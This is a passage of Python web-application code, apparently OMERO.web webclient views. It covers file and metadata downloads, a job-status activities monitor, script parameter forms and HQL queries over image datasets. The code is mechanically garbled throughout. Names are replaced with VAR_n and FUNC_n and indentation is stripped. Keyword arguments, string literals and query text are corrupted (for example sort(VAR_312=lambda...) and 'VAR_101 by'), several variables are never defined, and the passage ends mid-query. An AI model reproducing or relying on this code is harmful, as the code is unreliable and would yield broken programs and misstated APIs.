VAR_180 = VAR_6.getObject("FileAnnotation", VAR_34)
if VAR_180 is None:
return handlerInternalError(
VAR_2, "FileAnnotation does not exist (id:%s)." % (VAR_34)
)
VAR_174 = ConnCleaningHttpResponse(VAR_180.getFileInChunks(buf=settings.CHUNK_SIZE))
VAR_174.conn = VAR_6
VAR_174["Content-Type"] = "application/force-download"
VAR_174["Content-Length"] = VAR_180.getFileSize()
VAR_174["Content-Disposition"] = "attachment; filename=%s" % (
VAR_180.getFileName().replace(" ", "_")
)
return VAR_174
@login_required()
def FUNC_57(VAR_2, VAR_26, VAR_6=None, **VAR_7):
VAR_142 = VAR_6.getObject("Image", VAR_26)
if VAR_142 is None:
raise Http404("No Image found with ID %s" % VAR_26)
VAR_181 = VAR_142.loadOriginalMetadata()
VAR_182 = ["[Global Metadata]"]
VAR_182.extend(["%s=%s" % (kv[0], kv[1]) for kv in VAR_181[1]])
VAR_182.append("[Series Metadata]")
VAR_182.extend(["%s=%s" % (kv[0], kv[1]) for kv in VAR_181[2]])
VAR_183 = "\n".join(VAR_182)
VAR_174 = HttpResponse(VAR_183)
VAR_174["Content-Type"] = "application/force-download"
VAR_174["Content-Length"] = len(VAR_183)
VAR_174["Content-Disposition"] = "attachment; filename=Original_Metadata.txt"
return VAR_174
@login_required()
@render_response()
def FUNC_58(VAR_2, VAR_6=None, **VAR_7):
VAR_184 = VAR_2.GET.get("format", None)
if VAR_184 is not None:
VAR_191 = VAR_352("download_as")
VAR_305 = "Export_as_%s" % VAR_184
else:
VAR_191 = VAR_352("archived_files")
VAR_305 = "OriginalFileDownload"
VAR_185 = VAR_2.GET.get("ids") # E.g. VAR_142-1|VAR_142-2
VAR_186 = VAR_2.GET.get("name", VAR_305) # VAR_4 zip VAR_3
VAR_186 = os.path.basename(VAR_186) # remove VAR_316
if VAR_185 is None:
raise Http404("No IDs specified. E.g. ?VAR_187=VAR_142-1|VAR_142-2")
VAR_187 = VAR_185.split("|")
VAR_188 = []
VAR_189 = 0
VAR_190 = 0
if VAR_184 is None:
VAR_306 = []
VAR_214 = []
for VAR_320 in VAR_187:
if VAR_320.split("-")[0] == "image":
VAR_306.append(VAR_320.split("-")[1])
elif VAR_320.split("-")[0] == "well":
VAR_214.append(VAR_320.split("-")[1])
VAR_106 = []
if VAR_306:
VAR_106 = list(VAR_6.getObjects("Image", VAR_306))
if len(VAR_106) == 0:
raise Http404("No VAR_106 found.")
VAR_307 = set()
VAR_308 = set()
for VAR_142 in VAR_106:
VAR_365 = VAR_142.getFileset()
if VAR_365 is not None:
if VAR_365.id in VAR_307:
continue
VAR_307.add(VAR_365.id)
VAR_284 = list(VAR_142.getImportedImageFiles())
VAR_366 = []
for f in VAR_284:
if f.id in VAR_308:
continue
VAR_308.add(f.id)
VAR_366.append({"id": f.id, "name": f.name, "size": f.getSize()})
VAR_190 += f.getSize()
if len(VAR_366) > 0:
VAR_188.append(VAR_366)
VAR_189 = sum([len(VAR_366) for VAR_366 in VAR_188])
else:
VAR_189 = len(VAR_187)
VAR_176 = "&".join([_id.replace("-", "=") for _id in VAR_187])
VAR_191 = download_url + "?" + VAR_176
if VAR_184 is not None:
VAR_191 = download_url + "&VAR_184=%s" % VAR_184
VAR_53 = {
"template": "webclient/annotations/FUNC_58.html",
"url": VAR_191,
"defaultName": VAR_186,
"fileLists": VAR_188,
"fileCount": VAR_189,
"filesTotalSize": VAR_190,
}
if VAR_190 > settings.MAXIMUM_MULTIFILE_DOWNLOAD_ZIP_SIZE:
VAR_53["downloadTooLarge"] = settings.MAXIMUM_MULTIFILE_DOWNLOAD_ZIP_SIZE
return VAR_53
@login_required(setGroupContext=True)
@render_response()
def FUNC_59(VAR_2, VAR_35=None, VAR_36=None, VAR_6=None, **VAR_7):
VAR_54 = "webclient/history/calendar.html"
VAR_192 = VAR_2.session.get("user_id")
if VAR_35 is not None and VAR_36 is not None:
VAR_193 = BaseCalendar(VAR_6=conn, VAR_35=year, VAR_36=month, eid=VAR_192)
else:
VAR_309 = datetime.datetime.today()
VAR_193 = BaseCalendar(
VAR_6=conn, VAR_35=VAR_309.year, VAR_36=VAR_309.month, eid=VAR_192
)
VAR_193.create_calendar()
VAR_53 = {"controller": VAR_193}
VAR_53["template"] = VAR_54
return VAR_53
@login_required(setGroupContext=True)
@render_response()
def FUNC_60(VAR_2, VAR_35, VAR_36, VAR_37, VAR_6=None, **VAR_7):
if VAR_35 is None or VAR_36 is None or VAR_37 is None:
raise Http404("Year, VAR_36, and VAR_37 are required")
VAR_54 = "webclient/history/history_details.html"
VAR_87 = int(VAR_2.GET.get("page", 1))
VAR_192 = VAR_2.session.get("user_id")
VAR_193 = BaseCalendar(
VAR_6=conn, VAR_35=year, VAR_36=month, VAR_37=day, eid=VAR_192
)
VAR_193.get_items(VAR_87)
VAR_53 = {"controller": VAR_193}
VAR_53["template"] = VAR_54
return VAR_53
def FUNC_61(VAR_6, VAR_38):
VAR_194 = VAR_352(viewname="load_template", args=["userdata"])
if isinstance(VAR_38, omero.model.FileAnnotationI):
VAR_310 = VAR_6.getObject("Annotation", VAR_38.id.val)
for VAR_255 in ["project", "dataset", "image"]:
VAR_240 = list(VAR_310.getParentLinks(VAR_255))
if len(VAR_240) > 0:
VAR_38 = VAR_240[0].parent
break
if VAR_38.__class__.__name__ in (
"ImageI",
"DatasetI",
"ProjectI",
"ScreenI",
"PlateI",
"WellI",
):
VAR_311 = VAR_38.__class__.__name__[:-1].lower()
VAR_194 += "?VAR_59=%s-%s" % (VAR_311, VAR_38.id.val)
return VAR_194
def FUNC_62(VAR_2, VAR_39, **VAR_7):
for VAR_312, VAR_375 in VAR_7.items():
VAR_2.session["callback"][VAR_39][VAR_312] = VAR_375
@login_required()
@render_response()
def FUNC_63(VAR_2, VAR_6=None, **VAR_7):
VAR_195 = 0
VAR_196 = 0
VAR_197 = []
_purgeCallback(VAR_2)
VAR_198 = VAR_2.GET.get("jobId", None)
if VAR_198 is not None:
VAR_198 = VAR_347(VAR_198)
try:
VAR_367 = omero.cmd.HandlePrx.checkedCast(VAR_6.c.ic.stringToProxy(VAR_198))
VAR_315 = VAR_367.getStatus()
VAR_0.debug("job VAR_315: %s", VAR_315)
VAR_174 = VAR_367.getResponse()
if VAR_174 is not None:
VAR_172 = graphResponseMarshal(VAR_6, VAR_174)
VAR_172["finished"] = True
else:
VAR_172 = {"finished": False}
VAR_172["status"] = {
"currentStep": VAR_315.currentStep,
"steps": VAR_315.steps,
"startTime": VAR_315.startTime,
"stopTime": VAR_315.stopTime,
}
except IceException:
VAR_172 = {"finished": True}
return VAR_172
elif VAR_2.method == "DELETE":
try:
VAR_17 = json.loads(VAR_2.body)
except TypeError:
VAR_17 = json.loads(bytes_to_native_str(VAR_2.body))
VAR_198 = VAR_17.get("jobId", None)
if VAR_198 is not None:
VAR_198 = VAR_347(VAR_198)
VAR_172 = {"jobId": VAR_198}
try:
VAR_367 = omero.cmd.HandlePrx.checkedCast(VAR_6.c.ic.stringToProxy(VAR_198))
VAR_315 = VAR_367.getStatus()
VAR_0.debug("pre-cancel() job VAR_315: %s", VAR_315)
VAR_172["status"] = {
"currentStep": VAR_315.currentStep,
"steps": VAR_315.steps,
"startTime": VAR_315.startTime,
"stopTime": VAR_315.stopTime,
}
VAR_367.cancel()
except omero.LockTimeout:
VAR_0.info("Timeout on VAR_367.cancel()")
return VAR_172
for VAR_39 in VAR_2.session.get("callback").keys():
VAR_313 = VAR_2.session["callback"][VAR_39]
VAR_314 = VAR_313["job_type"]
VAR_315 = VAR_313["status"]
if VAR_315 == "failed":
VAR_196 += 1
VAR_2.session.modified = True
if VAR_314 in ("chgrp", "chown"):
if VAR_315 not in ("failed", "finished"):
VAR_174 = None
try:
VAR_367 = omero.cmd.HandlePrx.checkedCast(
VAR_6.c.ic.stringToProxy(VAR_39)
)
VAR_174 = VAR_367.getResponse()
VAR_431 = False
try:
if VAR_174 is not None:
VAR_431 = True
VAR_197.append(VAR_39)
if isinstance(VAR_174, omero.cmd.ERR):
VAR_447 = ", ".join(
[
"%s: %s" % (VAR_415, VAR_416)
for VAR_415, VAR_416 in VAR_174.parameters.items()
]
)
VAR_0.error(
"%s failed with: %s" % (VAR_314, VAR_447)
)
FUNC_62(
VAR_2,
VAR_39,
VAR_315="failed",
report="%s %s" % (VAR_174.name, VAR_447),
VAR_57=1,
)
elif isinstance(VAR_174, omero.cmd.OK):
FUNC_62(VAR_2, VAR_39, VAR_315="finished")
else:
VAR_195 += 1
finally:
VAR_367.close(VAR_431)
except Exception:
VAR_0.info(
"Activities %s VAR_84 not found: %s" % (VAR_314, VAR_39)
)
continue
elif VAR_314 == "send_email":
if VAR_315 not in ("failed", "finished"):
VAR_174 = None
try:
VAR_367 = omero.cmd.HandlePrx.checkedCast(
VAR_6.c.ic.stringToProxy(VAR_39)
)
VAR_444 = omero.callbacks.CmdCallbackI(
VAR_6.c, VAR_367, foreground_poll=True
)
VAR_174 = VAR_444.getResponse()
VAR_431 = False
try:
if VAR_174 is not None:
VAR_431 = True
VAR_197.append(VAR_39)
if isinstance(VAR_174, omero.cmd.ERR):
VAR_447 = ", ".join(
[
"%s: %s" % (VAR_415, VAR_416)
for VAR_415, VAR_416 in VAR_174.parameters.items()
]
)
VAR_0.error("send_email failed with: %s" % VAR_447)
FUNC_62(
VAR_2,
VAR_39,
VAR_315="failed",
report={"error": VAR_447},
VAR_57=1,
)
else:
VAR_450 = (
VAR_174.success
+ len(VAR_174.invalidusers)
+ len(VAR_174.invalidemails)
)
FUNC_62(
VAR_2,
VAR_39,
VAR_315="finished",
VAR_174={"success": VAR_174.success, "total": VAR_450},
)
if (
len(VAR_174.invalidusers) > 0
or len(VAR_174.invalidemails) > 0
):
VAR_453 = [
e.getFullName()
for e in list(
VAR_6.getObjects(
"Experimenter", VAR_174.invalidusers
)
)
]
FUNC_62(
VAR_2,
VAR_39,
report={
"invalidusers": VAR_453,
"invalidemails": VAR_174.invalidemails,
},
)
else:
VAR_195 += 1
finally:
VAR_444.close(VAR_431)
except Exception:
VAR_0.error(traceback.format_exc())
VAR_0.info("Activities send_email VAR_84 not found: %s" % VAR_39)
elif VAR_314 == "delete":
if VAR_315 not in ("failed", "finished"):
try:
VAR_84 = omero.cmd.HandlePrx.checkedCast(
VAR_6.c.ic.stringToProxy(VAR_39)
)
VAR_446 = omero.callbacks.CmdCallbackI(
VAR_6.c, VAR_84, foreground_poll=True
)
VAR_174 = VAR_446.getResponse()
VAR_431 = False
try:
if not VAR_174: # Response not available
FUNC_62(
VAR_2,
VAR_39,
VAR_57=0,
VAR_315="in progress",
dreport=_formatReport(VAR_84),
)
VAR_195 += 1
else: # Response available
VAR_431 = True
VAR_197.append(VAR_39)
VAR_174 = VAR_446.getResponse()
VAR_451 = isinstance(VAR_174, omero.cmd.ERR)
if VAR_451:
FUNC_62(
VAR_2,
VAR_39,
VAR_57=1,
VAR_315="failed",
dreport=_formatReport(VAR_84),
)
VAR_196 += 1
else:
FUNC_62(
VAR_2,
VAR_39,
VAR_57=0,
VAR_315="finished",
dreport=_formatReport(VAR_84),
)
finally:
VAR_446.close(VAR_431)
except Ice.ObjectNotExistException:
FUNC_62(
VAR_2, VAR_39, VAR_57=0, VAR_315="finished", dreport=None
)
except Exception as x:
VAR_0.error(traceback.format_exc())
VAR_0.error("Status job '%s'error:" % VAR_39)
FUNC_62(
VAR_2, VAR_39, VAR_57=1, VAR_315="failed", dreport=VAR_347(x)
)
VAR_196 += 1
elif VAR_314 == "script":
if not VAR_39.startswith("ProcessCallback"):
continue # ignore
if VAR_315 not in ("failed", "finished"):
VAR_0.info("Check VAR_444 on script: %s" % VAR_39)
try:
VAR_448 = omero.grid.ScriptProcessPrx.checkedCast(
VAR_6.c.ic.stringToProxy(VAR_39)
)
except IceException:
FUNC_62(
VAR_2,
VAR_39,
VAR_315="failed",
Message="No process found for job",
VAR_57=1,
)
continue
VAR_446 = omero.scripts.ProcessCallbackI(VAR_6.c, VAR_448)
if VAR_446.block(0): # ms.
VAR_446.close()
try:
VAR_452 = VAR_448.getResults(0, VAR_6.SERVICE_OPTS)
FUNC_62(VAR_2, VAR_39, VAR_315="finished")
VAR_197.append(VAR_39)
except Exception:
FUNC_62(
VAR_2,
VAR_39,
VAR_315="finished",
Message="Failed to FUNC_81 results",
)
VAR_0.info("Failed on VAR_448.getResults() for OMERO.script")
continue
VAR_449 = {}
for VAR_312, VAR_375 in VAR_452.items():
VAR_416 = VAR_375.getValue()
if VAR_312 in ("stdout", "stderr", "Message"):
if VAR_312 in ("stderr", "stdout"):
VAR_416 = VAR_416.id.val
VAR_454 = {VAR_312: VAR_416}
FUNC_62(VAR_2, VAR_39, **VAR_454)
else:
if hasattr(VAR_416, "id"):
VAR_456 = {
"id": VAR_416.id.val,
"type": VAR_416.__class__.__name__[:-1],
}
VAR_456["browse_url"] = FUNC_61(VAR_6, VAR_416)
if VAR_416.isLoaded() and hasattr(VAR_416, "file"):
VAR_458 = {
"image/png": "png",
"image/jpeg": "jpeg",
"text/plain": "text",
}
if VAR_416.file.mimetype.val in VAR_458:
VAR_456["fileType"] = VAR_458[
VAR_416.file.mimetype.val
]
VAR_456["fileId"] = VAR_416.file.id.val
VAR_456["name"] = VAR_416.file.name.val
if VAR_416.isLoaded() and hasattr(VAR_416, "name"):
VAR_3 = unwrap(VAR_416.name)
if VAR_3 is not None:
VAR_456["name"] = VAR_3
VAR_449[VAR_312] = VAR_456
else:
VAR_449[VAR_312] = unwrap(VAR_416)
FUNC_62(VAR_2, VAR_39, VAR_452=VAR_449)
else:
VAR_195 += 1
VAR_172 = {}
for VAR_39 in VAR_2.session.get("callback").keys():
VAR_172[VAR_39] = copy.copy(VAR_2.session["callback"][VAR_39])
if "template" in VAR_7 and VAR_7["template"] == "json":
for VAR_39 in VAR_2.session.get("callback").keys():
VAR_172[VAR_39]["start_time"] = VAR_347(
VAR_2.session["callback"][VAR_39]["start_time"]
)
VAR_172["inprogress"] = VAR_195
VAR_172["failure"] = VAR_196
VAR_172["jobs"] = len(VAR_2.session["callback"])
return JsonResponse(VAR_172) # json
VAR_199 = []
VAR_200 = False
for VAR_312, VAR_158 in VAR_172.items():
if len(VAR_312.split(" ")) > 0:
VAR_368 = VAR_312.split(" ")[0]
if len(VAR_368.split("/")) > 1:
VAR_368 = htmlId.split("/")[1]
VAR_172[VAR_312]["id"] = VAR_368
VAR_172[VAR_312]["key"] = VAR_312
if VAR_312 in VAR_197:
VAR_172[VAR_312]["new"] = True
if "error" in VAR_158 and VAR_158["error"] > 0:
VAR_200 = True
VAR_199.append(VAR_172[VAR_312])
VAR_199.sort(VAR_312=lambda x: x["start_time"], VAR_352=True)
VAR_53 = {
"sizeOfJobs": len(VAR_2.session["callback"]),
"jobs": VAR_199,
"inprogress": VAR_195,
"new_results": len(VAR_197),
"new_errors": VAR_200,
"failure": VAR_196,
}
VAR_53["template"] = "webclient/FUNC_63/activitiesContent.html"
return VAR_53
@login_required()
def FUNC_64(VAR_2, VAR_27, **VAR_7):
VAR_2.session.modified = True
if VAR_27 == "clean":
if "jobKey" in VAR_2.POST:
VAR_198 = VAR_2.POST.get("jobKey")
VAR_172 = {}
if VAR_198 in VAR_2.session["callback"]:
del VAR_2.session["callback"][VAR_198]
VAR_2.session.modified = True
VAR_172["removed"] = True
else:
VAR_172["removed"] = False
return JsonResponse(VAR_172)
else:
VAR_199 = list(VAR_2.session["callback"].items())
for VAR_312, VAR_158 in VAR_199:
if VAR_158["status"] != "in progress":
del VAR_2.session["callback"][VAR_312]
return HttpResponse("OK")
@login_required()
def FUNC_65(VAR_2, VAR_40=None, VAR_6=None, **VAR_7):
VAR_201 = VAR_6.getExperimenterPhoto(VAR_40)
return HttpResponse(VAR_201, content_type="image/jpeg")
@login_required()
def FUNC_66(VAR_2, VAR_41, VAR_25=None, **VAR_7):
VAR_7["viewport_server"] = (
VAR_25 is not None and VAR_352("webindex") + VAR_25 or VAR_352("webindex")
)
VAR_7["viewport_server"] = VAR_7["viewport_server"].rstrip("/")
return webgateway_views.full_viewer(VAR_2, VAR_41, **VAR_7)
@login_required()
@render_response()
def FUNC_67(VAR_2, VAR_6=None, **VAR_7):
VAR_202 = VAR_6.getScriptService()
VAR_203 = VAR_202.getScripts()
VAR_204 = {}
VAR_205 = (
VAR_2.session.get("server_settings", {})
.get("scripts_to_ignore", "")
.split(",")
)
for s in VAR_203:
VAR_42 = s.id.val
VAR_316 = s.path.val
VAR_3 = s.name.val
VAR_317 = os.path.join(VAR_316, VAR_3)
if VAR_317 in VAR_205:
VAR_0.info("Ignoring script %r" % VAR_317)
continue
ul = VAR_204
VAR_318 = VAR_317.split(os.path.sep)
for li, VAR_364 in enumerate(VAR_318):
if len(VAR_364) == 0:
continue
if VAR_364 not in VAR_206:
if li + 1 == len(VAR_318):
VAR_206[VAR_364] = VAR_42
else:
VAR_206[VAR_364] = {}
VAR_206 = ul[VAR_364]
def FUNC_85(VAR_206):
VAR_319 = []
for VAR_3, VAR_375 in VAR_206.items():
if isinstance(VAR_375, dict):
VAR_319.append({"name": VAR_3, "ul": FUNC_85(VAR_375)})
else:
VAR_319.append({"name": VAR_3, "id": VAR_375})
VAR_319.sort(VAR_312=lambda x: x["name"].lower())
return VAR_319
VAR_207 = FUNC_85(VAR_204)
if not VAR_2.GET.get("full_path") and len(VAR_207) == 1:
VAR_207 = scriptList[0]["ul"]
return VAR_207
@login_required()
@render_response()
def FUNC_68(VAR_2, VAR_42, VAR_6=None, **VAR_7):
VAR_202 = VAR_6.getScriptService()
try:
VAR_73 = VAR_202.getParams(VAR_241(VAR_42))
except Exception as ex:
if ex.message.lower().startswith("no processor available"):
return {
"template": "webclient/VAR_203/no_processor.html",
"scriptId": VAR_42,
}
raise ex
if VAR_73 is None:
return HttpResponse()
VAR_208 = {}
VAR_208["id"] = VAR_241(VAR_42)
VAR_208["name"] = VAR_73.name.replace("_", " ")
VAR_208["description"] = VAR_73.description
VAR_208["authors"] = ", ".join([a for a in VAR_73.authors])
VAR_208["contact"] = VAR_73.contact
VAR_208["version"] = VAR_73.version
VAR_208["institutions"] = ", ".join([VAR_320 for VAR_320 in VAR_73.institutions])
VAR_209 = [] # use a list so we can sort by 'grouping'
VAR_210 = None
VAR_211 = None
for VAR_312, VAR_322 in VAR_73.inputs.items():
VAR_320 = {}
VAR_320["name"] = VAR_312.replace("_", " ")
VAR_320["key"] = VAR_312
if not VAR_322.optional:
VAR_320["required"] = True
VAR_320["description"] = VAR_322.description
if VAR_322.min:
VAR_320["min"] = VAR_347(VAR_322.min.getValue())
if VAR_322.max:
VAR_320["max"] = VAR_347(VAR_322.max.getValue())
if VAR_322.values:
VAR_320["options"] = [VAR_416.getValue() for VAR_416 in VAR_322.values.getValue()]
if VAR_322.useDefault:
VAR_320["default"] = unwrap(VAR_322.prototype)
if isinstance(VAR_320["default"], omero.model.IObject):
VAR_320["default"] = None
VAR_321 = unwrap(VAR_322.prototype)
if VAR_321.__class__.__name__ == "dict":
VAR_320["map"] = True
elif VAR_321.__class__.__name__ == "list":
VAR_320["list"] = True
if "default" in VAR_320:
VAR_320["default"] = ",".join([VAR_347(VAR_364) for VAR_364 in VAR_320["default"]])
elif isinstance(VAR_321, bool):
VAR_320["boolean"] = True
elif isinstance(VAR_321, int) or isinstance(VAR_321, VAR_241):
VAR_320["number"] = "number"
elif isinstance(VAR_321, float):
VAR_320["number"] = "float"
if VAR_2.GET.get(VAR_312, None) is not None:
VAR_320["default"] = VAR_2.GET.get(VAR_312, None)
VAR_320["prototype"] = unwrap(VAR_322.prototype)
VAR_320["grouping"] = VAR_322.grouping
VAR_209.append(VAR_320)
if VAR_312 == "IDs":
VAR_211 = VAR_320 # remember these...
if VAR_312 == "Data_Type":
VAR_210 = VAR_320
VAR_209.sort(VAR_312=lambda VAR_320: VAR_320["grouping"])
if (
VAR_210 is not None
and VAR_211 is not None
and "options" in VAR_210
):
VAR_211["default"] = ""
for VAR_215 in VAR_210["options"]:
if VAR_2.GET.get(VAR_215, None) is not None:
VAR_210["default"] = VAR_215
VAR_211["default"] = VAR_2.GET.get(VAR_215, "")
break # only use the first match
if len(VAR_211["default"]) == 0 and VAR_2.GET.get("Well", None) is not None:
if "Image" in VAR_210["options"]:
VAR_214 = [VAR_241(j) for j in VAR_2.GET.get("Well", None).split(",")]
VAR_324 = 0
try:
VAR_324 = int(VAR_2.GET.get("Index", 0))
except Exception:
pass
VAR_113 = VAR_6.getObjects("Well", VAR_214)
VAR_306 = [VAR_347(w.getImage(VAR_324).getId()) for w in VAR_113]
VAR_210["default"] = "Image"
VAR_211["default"] = ",".join(VAR_306)
for VAR_320 in range(len(VAR_209)):
if len(VAR_209) <= VAR_320:
break
VAR_322 = VAR_209[VAR_320]
VAR_323 = VAR_322["grouping"] # E.g 03
VAR_322["children"] = list()
while len(VAR_209) > VAR_320 + 1:
VAR_369 = VAR_209[VAR_320 + 1]["grouping"] # E.g. 03.1
if VAR_369.split(".")[0] == VAR_323:
VAR_322["children"].append(VAR_209[VAR_320 + 1])
VAR_209.pop(VAR_320 + 1)
else:
break
VAR_208["inputs"] = VAR_209
return {
"template": "webclient/VAR_203/FUNC_68.html",
"paramData": VAR_208,
"scriptId": VAR_42,
}
@login_required()
@render_response()
def FUNC_69(VAR_2, VAR_43, VAR_6=None, **VAR_7):
VAR_212 = VAR_2.GET.get("Image", None) # comma - delimited list
VAR_213 = VAR_2.GET.get("Dataset", None)
VAR_214 = VAR_2.GET.get("Well", None)
if VAR_214 is not None:
VAR_214 = [VAR_241(VAR_320) for VAR_320 in VAR_214.split(",")]
VAR_113 = VAR_6.getObjects("Well", VAR_214)
VAR_324 = getIntOrDefault(VAR_2, "Index", 0)
VAR_212 = [VAR_347(w.getImage(VAR_324).getId()) for w in VAR_113]
VAR_212 = ",".join(VAR_212)
if VAR_212 is None and VAR_213 is None:
return HttpResponse(
"Need to specify /?Image=1,2 or /?Dataset=1,2 or /?Well=1,2"
)
def FUNC_86(VAR_215, VAR_187):
VAR_325 = [int(VAR_40) for VAR_40 in VAR_187.split(",")]
VAR_326 = {}
for VAR_38 in VAR_6.getObjects(VAR_215, VAR_325):
VAR_326[VAR_38.id] = VAR_38
VAR_327 = [VAR_41 for VAR_41 in VAR_325 if VAR_41 in VAR_326.keys()]
if len(VAR_327) == 0:
raise Http404("No %ss found with IDs %s" % (VAR_215, VAR_187))
else:
VAR_337 = list(VAR_326.values())[0].getDetails().group.id.val
VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_337)
return VAR_327, VAR_326
VAR_53 = {}
if VAR_212 is not None:
VAR_212, VAR_328 = FUNC_86("Image", VAR_212)
VAR_53["idString"] = ",".join([VAR_347(VAR_320) for VAR_320 in VAR_212])
VAR_53["dtype"] = "Image"
if VAR_213 is not None:
VAR_213, VAR_329 = FUNC_86("Dataset", VAR_213)
VAR_53["idString"] = ",".join([VAR_347(VAR_320) for VAR_320 in VAR_213])
VAR_53["dtype"] = "Dataset"
if VAR_43 == "SplitView":
VAR_330 = "/omero/figure_scripts/Split_View_Figure.py"
VAR_54 = "webclient/VAR_203/split_view_figure.html"
VAR_331 = [] # A list of VAR_158 about each VAR_142.
for VAR_432 in VAR_212:
VAR_158 = {"id": VAR_432}
VAR_370 = VAR_328[VAR_432]
VAR_158["name"] = VAR_370.getName()
VAR_164 = [
VAR_180.getTextValue()
for VAR_180 in VAR_370.listAnnotations()
if VAR_180._obj.__class__ == omero.model.TagAnnotationI
]
VAR_158["tags"] = VAR_164
VAR_158["datasets"] = [VAR_364.getName() for VAR_364 in VAR_370.listParents()]
VAR_331.append(VAR_158)
VAR_142 = VAR_328[VAR_212[0]]
VAR_53["imgDict"] = VAR_331
VAR_53["image"] = VAR_142
VAR_53["channels"] = VAR_142.getChannels()
elif VAR_43 == "Thumbnail":
VAR_330 = "/omero/figure_scripts/Thumbnail_Figure.py"
VAR_54 = "webclient/VAR_203/thumbnail_figure.html"
def FUNC_89(VAR_212):
VAR_408 = VAR_6.getAnnotationLinks("Image", parent_ids=VAR_212)
VAR_409 = {} # VAR_101 VAR_164. {VAR_26: [VAR_164]}
VAR_410 = {}
for VAR_432 in VAR_212:
VAR_409[VAR_432] = []
for VAR_346 in VAR_408:
VAR_383 = VAR_346.getChild()
if VAR_383._obj.__class__ == omero.model.TagAnnotationI:
VAR_410[VAR_383.id] = VAR_383
VAR_409[VAR_346.getParent().id].append(VAR_383)
VAR_411 = []
for VAR_432 in VAR_212:
VAR_411.append({"id": VAR_432, "tags": VAR_409[VAR_432]})
VAR_164 = []
for tId, VAR_433 in VAR_410.items():
VAR_164.append(VAR_433)
return VAR_411, VAR_164
VAR_371 = [] # multiple collections of VAR_106
VAR_164 = []
VAR_372 = "Thumbnail_Figure"
if VAR_213 is not None:
for VAR_364 in VAR_6.getObjects("Dataset", VAR_213):
VAR_306 = [VAR_320.id for VAR_320 in VAR_364.listChildren()]
VAR_411, VAR_412 = FUNC_89(VAR_306)
VAR_371.append({"name": VAR_364.getName(), "imageTags": VAR_411})
VAR_164.extend(VAR_412)
VAR_372 = VAR_371[0]["name"]
else:
VAR_411, VAR_412 = FUNC_89(VAR_212)
VAR_371.append({"name": "images", "imageTags": VAR_411})
VAR_164.extend(VAR_412)
VAR_413 = VAR_6.getObject("Image", VAR_212[0]).getParent()
VAR_372 = VAR_413.getName() or "Thumbnail Figure"
VAR_53["parent_id"] = VAR_413.getId()
VAR_373 = set() # remove duplicates
VAR_374 = []
for VAR_433 in VAR_164:
if VAR_433.id not in VAR_373:
VAR_374.append(VAR_433)
VAR_373.add(VAR_433.id)
VAR_374.sort(VAR_312=lambda x: x.getTextValue().lower())
VAR_53["thumbSets"] = VAR_371
VAR_53["tags"] = VAR_374
VAR_53["figureName"] = VAR_372.replace(" ", "_")
elif VAR_43 == "MakeMovie":
VAR_330 = "/omero/export_scripts/Make_Movie.py"
VAR_54 = "webclient/VAR_203/make_movie.html"
VAR_142 = VAR_6.getObject("Image", VAR_212[0])
VAR_414 = VAR_142.getName().rsplit(".", 1)
if len(VAR_414) > 1 and len(VAR_414[1]) > 3:
VAR_414 = ".".join(VAR_414)
else:
VAR_414 = movieName[0]
VAR_53["movieName"] = os.path.basename(VAR_414)
VAR_282 = []
for VAR_383 in VAR_142.getChannels():
VAR_282.append(
{
"active": VAR_383.isActive(),
"color": VAR_383.getColor().getHtml(),
"label": VAR_383.getLabel(),
}
)
VAR_53["channels"] = VAR_282
VAR_53["sizeT"] = VAR_142.getSizeT()
VAR_53["sizeZ"] = VAR_142.getSizeZ()
VAR_202 = VAR_6.getScriptService()
VAR_42 = VAR_202.getScriptID(VAR_330)
if VAR_42 < 0:
raise AttributeError("No script found for VAR_316 '%s'" % VAR_330)
VAR_53["template"] = VAR_54
VAR_53["scriptId"] = VAR_42
return VAR_53
@login_required()
@render_response()
def FUNC_70(VAR_2, VAR_27, VAR_6=None, **VAR_7):
VAR_216 = {}
for VAR_215 in ("Image", "Dataset", "Project"):
VAR_187 = VAR_2.GET.get(VAR_215, None)
if VAR_187 is not None:
VAR_216[VAR_215] = [int(VAR_320) for VAR_320 in VAR_187.split(",")]
VAR_217 = VAR_6.getContainerService().getImagesBySplitFilesets(
VAR_216, None, VAR_6.SERVICE_OPTS
)
VAR_218 = []
for fsId, splitIds in VAR_217.items():
VAR_218.append(
{
"id": fsId,
"attempted_iids": splitIds[True],
"blocking_iids": splitIds[False],
}
)
VAR_53 = {"split_filesets": VAR_218}
VAR_53["action"] = VAR_27
if VAR_27 == "chgrp":
VAR_53["action"] = "move"
VAR_53["template"] = "webclient/FUNC_63/" "fileset_check_dialog_content.html"
return VAR_53
def FUNC_71(
VAR_6, VAR_44, VAR_45, VAR_46, VAR_47, VAR_48, VAR_11
):
VAR_73 = omero.sys.ParametersI()
VAR_74 = VAR_6.getQueryService()
VAR_44 = set(VAR_44)
VAR_45 = set(VAR_45)
VAR_46 = set(VAR_46)
VAR_219 = set([])
VAR_48 = set(VAR_48)
VAR_47 = set(VAR_47)
if VAR_44:
VAR_73.map = {}
VAR_73.map["pids"] = rlist([rlong(x) for x in list(VAR_44)])
VAR_75 = """
select pdlink.child.id
from ProjectDatasetLink pdlink
where pdlink.parent.id in (:pids)
"""
for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
VAR_45.add(e[0].val)
if VAR_47:
VAR_73.map = {}
VAR_73.map["sids"] = rlist([rlong(x) for x in VAR_47])
VAR_75 = """
select splink.child.id
from ScreenPlateLink splink
where splink.parent.id in (:sids)
"""
for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
VAR_48.add(e[0].val)
if VAR_45:
VAR_73.map = {}
VAR_73.map["dids"] = rlist([rlong(x) for x in VAR_45])
VAR_75 = """
select dilink.child.id,
dilink.child.fileset.id
from DatasetImageLink dilink
where dilink.parent.id in (:dids)
"""
for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
VAR_46.add(e[0].val)
if e[1] is not None:
VAR_219.add(e[1].val)
if VAR_48:
VAR_73.map = {}
VAR_73.map["plids"] = rlist([rlong(x) for x in VAR_48])
VAR_75 = """
select ws.image.id
from WellSample ws
join ws.plateAcquisition pa
where pa.plate.id in (:plids)
"""
for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
VAR_46.add(e[0].val)
if VAR_219:
VAR_73.map = {}
VAR_73.map["fsids"] = rlist([rlong(x) for x in VAR_219])
VAR_75 = """
select VAR_142.id
from Image VAR_142
left outer join VAR_142.datasetLinks dilink
where VAR_142.fileset.id in (select VAR_365.id
from Image im
join im.fileset VAR_365
where VAR_365.id in (:fsids)
VAR_101 by VAR_365.id
